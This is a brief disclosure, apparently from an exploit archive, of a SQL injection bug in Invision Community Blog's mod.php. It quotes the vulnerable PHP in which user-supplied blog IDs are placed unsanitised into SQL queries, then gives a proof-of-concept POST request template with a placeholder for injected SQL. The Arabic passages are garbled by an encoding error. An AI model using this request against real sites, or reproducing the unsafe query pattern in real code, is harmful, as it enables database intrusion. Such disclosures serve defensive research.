invisionCBSQL.txt

`[LEFT]  
Invision Community Blog .. Bugs  
  
SQL Injection :-  
  
Filename :- mod.php  
Function name :- do_mmod()  
  
The $ids Unfilter Input By Intval As Array :) So We Can Do SQL Injection -->  
* Arabic *  
[/LEFT]  
[RIGHT]  
ÇáãÊÛíÑ $ids ÛíÑ ãÝáÊÑ Úä ØÑíÞ ÇáÏÇáå intval æåæ ÈÔßá ãÕÝæÝå .. áåÐÇ ÇáÓÈÈ ããßä Úãá ÷ÍÞäå  
[/RIGHT]  
[LEFT]  
[php]  
$ids = array();  
$ids = explode( ',', $this->ipsclass->input['selectedbids'] );  
  
...  
  
$ids = implode( ',', $ids );  
  
...  
  
$this->ipsclass->DB->do_update ( 'blog_blogs', array ( 'blog_disabled' => 1 ), "blog_id IN ({$ids})" );  
$this->ipsclass->DB->simple_construct ( array ( 'select' => 'member_id', 'from' => 'blog_blogs', 'where' => "blog_id IN ({$ids})" ) );  
$this->ipsclass->DB->simple_exec();  
  
....  
  
$this->ipsclass->DB->do_update ( 'blog_blogs', array ( 'blog_disabled' => 0 ), "blog_id IN ({$ids})");  
$this->ipsclass->DB->simple_construct ( array ( 'select' => 'member_id', 'from' => 'blog_blogs', 'where' => "blog_id IN ({$ids})" ) );  
  
....  
  
[/php]  
[/LEFT]  
[RIGHT]  
*ÇáÇÓÊÛáÇá*  
[/RIGHT]  
[LEFT]  
Exploit :-  
  
GET ^  
/IBP/index.php?  
POST ^  
automodule=blog&req=blogmmod&auth_key=[auth_key]&selectedbids=-1,-1)[SQL]&blogact=unpin  
[/LEFT]  
  
  
  
`